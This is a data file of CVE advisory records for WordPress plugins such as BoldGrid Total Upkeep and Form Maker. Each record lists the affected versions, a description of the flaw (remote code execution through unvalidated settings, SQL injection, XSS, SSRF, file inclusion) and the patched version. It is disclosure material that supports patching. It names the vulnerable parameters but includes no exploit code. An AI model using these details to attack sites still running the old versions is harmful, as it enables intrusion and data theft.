{"CVE_ID":"CVE-2025-2257","slug":"boldgrid-backup","versionImpact":"1.16.10","versionEndExcluding":"1.17.0","description":"The Total Upkeep \u2013 WordPress Backup Plugin plus Restore & Migrate by BoldGrid plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.16.10 via the compression_level setting. This is due to the plugin using the compression_level setting in proc_open() without any validation. This makes it possible for authenticated attackers, with administrator-level access and above, to execute code on the server.","recommendation":"Update to version 1.17.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/BoldGrid\\\/boldgrid-backup\\\/pull\\\/622\\\/files\",\"name\":\"https:\\\/\\\/github.com\\\/BoldGrid\\\/boldgrid-backup\\\/pull\\\/622\\\/files\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/boldgrid-backup\\\/tags\\\/1.16.7\\\/admin\\\/compressor\\\/class-boldgrid-backup-admin-compressor-system-zip.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/boldgrid-backup\\\/tags\\\/1.16.7\\\/admin\\\/compressor\\\/class-boldgrid-backup-admin-compressor-system-zip.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3257988%40boldgrid-backup&new=3257988%40boldgrid-backup&sfp_email=&sfph_mail=#file9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3257988%40boldgrid-backup&new=3257988%40boldgrid-backup&sfp_email=&sfph_mail=#file9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ec3cc3e-c11b-43b6-9dd0-caa5ccfb90c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ec3cc3e-c11b-43b6-9dd0-caa5ccfb90c8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13907","slug":"boldgrid-backup","versionImpact":"1.16.8","versionEndExcluding":"1.16.9","description":"The Total Upkeep \u2013 WordPress Backup Plugin plus Restore & Migrate by BoldGrid plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.16.8 via the 'download' function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 1.16.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boldgrid-backup\\\/trunk\\\/includes\\\/class-boldgrid-backup-archive-fetcher.php#L141\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boldgrid-backup\\\/trunk\\\/includes\\\/class-boldgrid-backup-archive-fetcher.php#L141\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246655\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246655\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21da92d2-c38d-4a12-b850-bd0b580aaa54?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21da92d2-c38d-4a12-b850-bd0b580aaa54?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9461","slug":"boldgrid-backup","versionImpact":"1.16.6","versionEndExcluding":"1.16.7","description":"The Total Upkeep \u2013 WordPress Backup Plugin plus Restore & Migrate by BoldGrid plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.16.6 via the cron_interval parameter. This is due to missing input validation and sanitization. This makes it possible for authenticated attackers, with Administrator-level access and above, to execute code on the server.","recommendation":"Update to version 1.16.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boldgrid-backup\\\/tags\\\/1.16.5\\\/admin\\\/class-boldgrid-backup-admin-settings.php#L748\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boldgrid-backup\\\/tags\\\/1.16.5\\\/admin\\\/class-boldgrid-backup-admin-settings.php#L748\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/804b42a0-1cea-4f68-bd4a-d292a9f23fbe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/804b42a0-1cea-4f68-bd4a-d292a9f23fbe?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3111","slug":"h5p","versionImpact":"1.15.7","versionEndExcluding":"1.15.8","description":"The Interactive Content  WordPress plugin before 1.15.8 does not validate uploads which could allow a Contributors and above to update malicious SVG files, leading to Stored Cross-Site Scripting issues","recommendation":"Update to version 1.15.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7c39f3b5-d407-4eb0-aa34-b498fe196c55\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7c39f3b5-d407-4eb0-aa34-b498fe196c55\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9887","slug":"miniorange-wp-as-saml-idp","versionImpact":"1.15.6","versionEndExcluding":"1.15.7","description":"The Login using WordPress Users ( WP as SAML IDP ) plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018id\u2019 parameter in all versions up to, and including, 1.15.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.15.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/220b0e71-8e80-4a29-982e-259a475835fe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/220b0e71-8e80-4a29-982e-259a475835fe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/GumGumZz\\\/wordpress\\\/blob\\\/main\\\/miniorange-wp-as-saml-idp.md\",\"name\":\"https:\\\/\\\/github.com\\\/GumGumZz\\\/wordpress\\\/blob\\\/main\\\/miniorange-wp-as-saml-idp.md\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-wp-as-saml-idp\\\/trunk\\\/controllers\\\/sso-idp-settings.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-wp-as-saml-idp\\\/trunk\\\/controllers\\\/sso-idp-settings.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3184249%40miniorange-wp-as-saml-idp%2Ftrunk&old=3158222%40miniorange-wp-as-saml-idp%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3184249%40miniorange-wp-as-saml-idp%2Ftrunk&old=3158222%40miniorange-wp-as-saml-idp%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3883","slug":"interactive-3d-flipbook-powered-physics-engine","versionImpact":"1.15.4","versionEndExcluding":"1.15.5","description":"The 3D FlipBook plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Bookmark URL field in all versions up to, and including, 1.15.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.15.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/016462cf-abe9-4c90-abd2-b5bb69348d7e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/016462cf-abe9-4c90-abd2-b5bb69348d7e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079536\\\/interactive-3d-flipbook-powered-physics-engine\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079536\\\/interactive-3d-flipbook-powered-physics-engine\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3671","slug":"multiparcels-shipping-for-woocommerce","versionEndExcluding":"1.15.4","description":"The MultiParcels Shipping For WooCommerce WordPress plugin before 1.15.4 does not sanitise and escape various parameters before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8b765f39-38e0-49c7-843a-a5b9375a32e7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8b765f39-38e0-49c7-843a-a5b9375a32e7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3954","slug":"multiparcels-shipping-for-woocommerce","versionEndExcluding":"1.15.4","description":"The MultiParcels Shipping For WooCommerce WordPress plugin before 1.15.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b463ccbb-2dc1-479f-bc88-becd204b2dc0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b463ccbb-2dc1-479f-bc88-becd204b2dc0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13605","slug":"form-maker","versionImpact":"1.15.32","versionEndExcluding":"1.15.33","description":"The Form Maker by 10Web  WordPress plugin before 1.15.33 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.15.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5543b3b-1c28-481b-aba4-9a07d160e1f2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5543b3b-1c28-481b-aba4-9a07d160e1f2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13053","slug":"form-maker","versionImpact":"1.15.32","versionEndExcluding":"1.15.33","description":"The Form Maker by 10Web  WordPress plugin before 1.15.33 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.15.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c667a70-8b38-4854-8969-2971f9c2fe79\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c667a70-8b38-4854-8969-2971f9c2fe79\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10680","slug":"form-maker","versionImpact":"1.15.31","versionEndExcluding":"1.15.32","description":"The Form Maker by 10Web  WordPress plugin before 1.15.32 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.15.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/240948d7-ece0-437f-b926-62937bdbd9db\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/240948d7-ece0-437f-b926-62937bdbd9db\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10562","slug":"form-maker","versionImpact":"1.15.30","versionEndExcluding":"1.15.31","description":"The Form Maker by 10Web  WordPress plugin before 1.15.31 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.15.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/317f6cb7-774f-4381-a855-858c051aa1d5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/317f6cb7-774f-4381-a855-858c051aa1d5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10558","slug":"form-maker","versionImpact":"1.15.29","versionEndExcluding":"1.15.30","description":"The Form Maker by 10Web  WordPress plugin before 1.15.30 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.15.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7028db78-2870-48d5-b06b-480ac8be3655\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7028db78-2870-48d5-b06b-480ac8be3655\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10560","slug":"form-maker","versionImpact":"1.15.29","versionEndExcluding":"1.15.30","description":"The Form Maker by 10Web  WordPress plugin before 1.15.30 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.15.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/80298c89-544d-4894-a837-253f5f26cf42\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/80298c89-544d-4894-a837-253f5f26cf42\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6776","slug":"interactive-3d-flipbook-powered-physics-engine","versionImpact":"1.15.2","versionEndExcluding":"1.15.3","description":"The 3D FlipBook plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018Ready Function\u2019 field in all versions up to, and including, 1.15.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.15.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/500fd8aa-9ad1-41ee-bbeb-cda9c80c4fcb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/500fd8aa-9ad1-41ee-bbeb-cda9c80c4fcb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3014013\\\/interactive-3d-flipbook-powered-physics-engine\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3014013\\\/interactive-3d-flipbook-powered-physics-engine\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6130","slug":"form-maker","versionImpact":"1.15.25","versionEndExcluding":"1.15.26","description":"The Form Maker by 10Web  WordPress plugin before 1.15.26 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.15.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bbed2968-4bd6-49ae-bd61-8a1f751e7041\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bbed2968-4bd6-49ae-bd61-8a1f751e7041\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0667","slug":"form-maker","versionImpact":"1.15.21","versionEndExcluding":"1.15.22","description":"The Form Maker by 10Web \u2013 Mobile-Friendly Drag & Drop Contact Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.15.21. This is due to missing or incorrect nonce validation on the 'execute' function. This makes it possible for unauthenticated attackers to execute arbitrary methods in the 'BoosterController' class via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.15.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d55c832b-f558-4e8a-8301-33dd38d39ef1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d55c832b-f558-4e8a-8301-33dd38d39ef1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/form-maker\\\/tags\\\/1.15.21\\\/booster\\\/controller.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/form-maker\\\/tags\\\/1.15.21\\\/booster\\\/controller.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3027368%40form-maker&new=3027368%40form-maker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3027368%40form-maker&new=3027368%40form-maker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4666","slug":"form-maker","versionEndExcluding":"1.15.20","description":"The Form Maker by 10Web WordPress plugin before 1.15.20 does not validate signatures when creating them on the server from user input, allowing unauthenticated users to create arbitrary files and lead to RCE","recommendation":"Update to version 1.15.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c6597e36-02d6-46b4-89db-52c160f418be\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c6597e36-02d6-46b4-89db-52c160f418be\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9694","slug":"cmsmasters-elementor-addon","versionImpact":"1.14.7","versionEndExcluding":"1.15.0","description":"The CMSMasters Elementor Addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.14.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.15.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/docs.cmsmasters.net\\\/cmsmasters-elementor-addon-changelog\\\/\",\"name\":\"https:\\\/\\\/docs.cmsmasters.net\\\/cmsmasters-elementor-addon-changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7eb78b64-ebe3-44e9-9061-d380693c5566?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7eb78b64-ebe3-44e9-9061-d380693c5566?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36656","slug":"ultimate-addons-for-gutenberg","versionEndExcluding":"1.15.0","description":"The Spectra WordPress plugin before 1.15.0 does not sanitize user input as it reaches its style HTML attribute, allowing contributors to conduct stored XSS attacks via the plugin's Gutenberg blocks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10f7e892-7a91-4292-b03e-6ad75756488b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10f7e892-7a91-4292-b03e-6ad75756488b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36702","slug":"ultimate-addons-for-gutenberg","versionImpact":"1.14.7","versionEndExcluding":"1.14.8","description":"The Ultimate Addons for Gutenberg plugin for WordPress is vulnerable to Authenticated Settings Change in versions up to, and including, 1.14.7. This is due to missing capability checks on several AJAX actions. This makes it possible for authenticated attackers with subscriber+ roles to update the plugin's settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4419a302-4305-44f8-a256-dd276b5cd751?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4419a302-4305-44f8-a256-dd276b5cd751?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ultimate-addons-for-gutenberg-plugin-fixed-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ultimate-addons-for-gutenberg-plugin-fixed-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8252","slug":"clean-login","versionImpact":"1.14.5","versionEndExcluding":"1.14.6","description":"The Clean Login plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.14.5 via the 'template' attribute of the clean-login-register shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 1.14.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9f99b51-e1b1-4cd3-a9f7-24e4b59811a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9f99b51-e1b1-4cd3-a9f7-24e4b59811a7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clean-login\\\/tags\\\/1.14.5\\\/include\\\/shortcodes.php#L146\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clean-login\\\/tags\\\/1.14.5\\\/include\\\/shortcodes.php#L146\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clean-login\\\/tags\\\/1.14.5\\\/include\\\/frontend.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clean-login\\\/tags\\\/1.14.5\\\/include\\\/frontend.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3143241%40clean-login&new=3143241%40clean-login&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3143241%40clean-login&new=3143241%40clean-login&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2843","slug":"multiparcels-shipping-for-woocommerce","versionEndExcluding":"1.14.15","description":"The MultiParcels Shipping For WooCommerce WordPress plugin before 1.14.15 does not properly sanitize and escape a parameter before using it in an SQL statement, which could allow any authenticated users, such as subscribers, to perform SQL Injection attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8e713eaf-f332-47e2-a131-c14222201fdc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8e713eaf-f332-47e2-a131-c14222201fdc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4932","slug":"boldgrid-backup","versionEndExcluding":"1.14.14","description":"The Total Upkeep plugin for WordPress is vulnerable to information disclosure in versions up to, and including 1.14.13. This is due to missing authorization on the heartbeat_received() function that triggers on WordPress heartbeat. This makes it possible for authenticated attackers, with subscriber-level permissions and above to retrieve back-up paths that can subsequently be used to download the back-up.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2684462%40boldgrid-backup&new=2684462%40boldgrid-backup&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2684462%40boldgrid-backup&new=2684462%40boldgrid-backup&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e346146-1c00-4e03-a6c7-372566d7ffc9\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e346146-1c00-4e03-a6c7-372566d7ffc9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3365","slug":"multiparcels-shipping-for-woocommerce","versionEndExcluding":"1.14.14","description":"The MultiParcels Shipping For WooCommerce WordPress plugin before 1.14.14 does not have authorisation when deleting shipment, allowing any authenticated users, such as subscriber to delete arbitrary shipment","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/21ce5baa-8085-4053-8d8b-f7d3e2ae70c1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/21ce5baa-8085-4053-8d8b-f7d3e2ae70c1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36848","slug":"boldgrid-backup","versionImpact":"1.14.9","versionEndExcluding":"1.14.10","description":"The Total Upkeep \u2013 WordPress Backup Plugin plus Restore & Migrate by BoldGrid plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.14.9 via the env-info.php and restore-info.json files. This makes it possible for unauthenticated attackers to find the location of back-up files and subsequently download them.","recommendation":"Update to version 1.14.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2439376\\\/boldgrid-backup\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2439376\\\/boldgrid-backup\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/auxiliary\\\/scanner\\\/http\\\/wp_total_upkeep_downloader.rb\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/auxiliary\\\/scanner\\\/http\\\/wp_total_upkeep_downloader.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d35c19d9-8586-4c5b-9a01-44739cbeee19\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d35c19d9-8586-4c5b-9a01-44739cbeee19\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86a5adaf-02b7-4b42-a048-8bc01f07656b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86a5adaf-02b7-4b42-a048-8bc01f07656b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13215","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.13.10","versionEndExcluding":"1.14","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.13.10 via the 'render' function in modules\/modal-popup\/widgets\/modal-popup.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, scheduled, and draft template data.","recommendation":"Update to version 1.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/modal-popup\\\/widgets\\\/modal-popup.php#L1058\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/modal-popup\\\/widgets\\\/modal-popup.php#L1058\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221982\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221982\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4feacb75-0533-4f53-8ce9-3e45ee8336e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4feacb75-0533-4f53-8ce9-3e45ee8336e2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
